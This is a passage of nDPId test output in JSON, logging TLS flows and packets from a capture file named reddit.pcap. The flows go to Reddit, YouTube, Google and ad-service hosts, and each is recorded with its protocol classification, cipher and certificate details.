+00945{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4861,"source":"reddit.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688830,"flow_last_seen":1605291688894,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291688894,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2001","src_port":58122,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.YouTube","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1.2","client_requested_server_name":"yt3.ggpht.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4865,"source":"reddit.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1605291688894,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688894,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgVAAAAAAAAIBYqAcsBIEmLB5kd7IUo3\/YpAbvMSCvRvaZMy7vtoBJXgIUlAAACBAV4AQMDAwQCCArC10OaRJp0xw=="} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4867,"source":"reddit.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":3,"flow_last_seen":1605291688894,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291688894,"pkt":"qtsDr8lk5EKm5WPyht1gDPOvACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFQAAAAAAACAWzEgBu0zLu+0r0b2ngBAB+wj4AAABAQgKRJp1BsLXQ5o="} +00943{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4885,"source":"reddit.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688831,"flow_last_seen":1605291688895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291688895,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2016","src_port":52296,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.YouTube","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1.2","client_requested_server_name":"i.ytimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00986{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5588,"source":"reddit.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688830,"flow_last_seen":1605291688963,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291688963,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2001","src_port":58122,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.YouTube","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1.3","client_requested_server_name":"yt3.ggpht.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00984{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5606,"source":"reddit.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688831,"flow_last_seen":1605291688963,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291688963,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2016","src_port":52296,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.YouTube","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1.3","client_requested_server_name":"i.ytimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00994{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5611,"source":"reddit.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688843,"flow_last_seen":1605291688963,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291688963,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80c::2003","src_port":47302,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"fonts.gstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00994{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5621,"source":"reddit.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688843,"flow_last_seen":1605291688963,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291688963,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80c::2003","src_port":47304,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"fonts.gstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7094,"source":"reddit.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291689408,"flow_last_seen":1605291689408,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291689408,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56640,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7094,"source":"reddit.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1605291689408,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291689408,"pkt":"qtsDr8lk5EKm5WPyht1gCYSFACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3UABuxOPoYYAAAAAoAL9IMRnAAACBAWgBAIICql08xMAAAAAAQMDBw=="} +00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7110,"source":"reddit.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1605291689433,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291689433,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdQHZ86cETj6GHoBJXgAFCAAACBAV4AQMDAwQCCArC10XLqXTzEw=="} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7111,"source":"reddit.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":3,"flow_last_seen":1605291689433,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291689433,"pkt":"qtsDr8lk5EKm5WPyht1gCYSFACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3UABuxOPoYd2fOnCgBAB+4U5AAABAQgKqXTzLcLXRcs="} +00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7112,"source":"reddit.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291689408,"flow_last_seen":1605291689434,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291689434,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56640,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.reddit.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01007{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8671,"source":"reddit.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291689408,"flow_last_seen":1605291689577,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291689577,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56640,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.reddit.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01277{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8678,"source":"reddit.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605291689408,"flow_last_seen":1605291689578,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"thread_ts_msec":1605291689578,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56640,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.reddit.com","server_names":"reddit.com,*.reddit.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.reddit.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"DB:E9:D5:FE:EB:EF:68:34:55:FD:62:BA:C9:BB:04:D4:E3:22:18:81"}} +00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9080,"source":"reddit.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291690373,"flow_last_seen":1605291690373,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291690373,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2002","src_port":51006,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9080,"source":"reddit.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1605291690373,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690373,"pkt":"qtsDr8lk5EKm5WPyht1gB68TACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBQAAAAAAACACxz4Buz6Su2UAAAAAoAL9IFr7AAACBAWgBAIIClRf7UgAAAAAAQMDBw=="} +00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9081,"source":"reddit.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291690384,"flow_last_seen":1605291690384,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291690384,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2002","src_port":59336,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9081,"source":"reddit.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1605291690384,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690384,"pkt":"qtsDr8lk5EKm5WPyht1gCvtsACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICwAAAAAAACAC58gBu5uynDEAAAAAoAL9IAqWAAACBAWgBAIICgxmJysAAAAAAQMDBw=="} +00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9082,"source":"reddit.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1605291690396,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690396,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgFAAAAAAAAIAIqAcsBIEmLB5kd7IUo3\/YpAbvHPls7Xl4+krtmoBJXgDq4AAACBAV4AQMDAwQCCArC10mNVF\/tSA=="} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9083,"source":"reddit.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1605291690396,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291690396,"pkt":"qtsDr8lk5EKm5WPyht1gB68TACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBQAAAAAAACACxz4Buz6Su2ZbO15fgBAB+76yAAABAQgKVF\/tX8LXSY0="} +00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9084,"source":"reddit.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690373,"flow_last_seen":1605291690396,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690396,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2002","src_port":51006,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"adservice.google.fr","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9086,"source":"reddit.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1605291690402,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690402,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgLAAAAAAAAIAIqAcsBIEmLB5kd7IUo3\/YpAbvnyP\/5OOmbspwyoBJXgGsCAAACBAV4AQMDAwQCCArC10mUDGYnKw=="} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9087,"source":"reddit.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":3,"flow_last_seen":1605291690402,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291690402,"pkt":"qtsDr8lk5EKm5WPyht1gCvtsACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICwAAAAAAACAC58gBu5uynDL\/+TjqgBAB++8BAAABAQgKDGYnPcLXSZQ="} +00956{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9088,"source":"reddit.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690384,"flow_last_seen":1605291690403,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690403,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2002","src_port":59336,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"adservice.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9089,"source":"reddit.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291690405,"flow_last_seen":1605291690405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291690405,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::345f:7ca5","src_port":46646,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9089,"source":"reddit.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1605291690405,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690405,"pkt":"qtsDr8lk5EKm5WPyht1gBYjGACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAAA0X3yltjYBu5sO15YAAAAAoAL9IOjCAAACBAWgBAIICgKUPwEAAAAAAQMDBw=="} +00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9090,"source":"reddit.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291690421,"flow_last_seen":1605291690421,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291690421,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2001","src_port":59624,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9090,"source":"reddit.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1605291690421,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690421,"pkt":"qtsDr8lk5EKm5WPyht1gBJW4ACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICwAAAAAAACAB6OgBu5zTDYMAAAAAoAL9IIEIAAACBAWgBAIICl8E6ogAAAAAAQMDBw=="} +00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9093,"source":"reddit.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1605291690440,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690440,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAADRffKUqAcsBIEmLB5kd7IUo3\/YpAbu2Nv\/zx++bDteXoBJXgLoLAAACBAV4AQMDAwQCCArC10m3ApQ\/AQ=="} +00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9094,"source":"reddit.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1605291690440,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291690440,"pkt":"qtsDr8lk5EKm5WPyht1gBYjGACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAAA0X3yltjYBu5sO15f\/88fwgBAB+z36AAABAQgKApQ\/JMLXSbc="} +00956{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9095,"source":"reddit.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690405,"flow_last_seen":1605291690440,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690440,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::345f:7ca5","src_port":46646,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"aax-eu.amazon-adsystem.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00996{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9096,"source":"reddit.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690373,"flow_last_seen":1605291690448,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291690448,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2002","src_port":51006,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"adservice.google.fr","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9098,"source":"reddit.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1605291690449,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690449,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgLAAAAAAAAIAEqAcsBIEmLB5kd7IUo3\/YpAbvo6PvOtUOc0w2EoBJXgGkiAAACBAV4AQMDAwQCCArC10m3XwTqiA=="} +00997{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9099,"source":"reddit.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291690384,"flow_last_seen":1605291690449,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291690449,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2002","src_port":59336,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"adservice.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 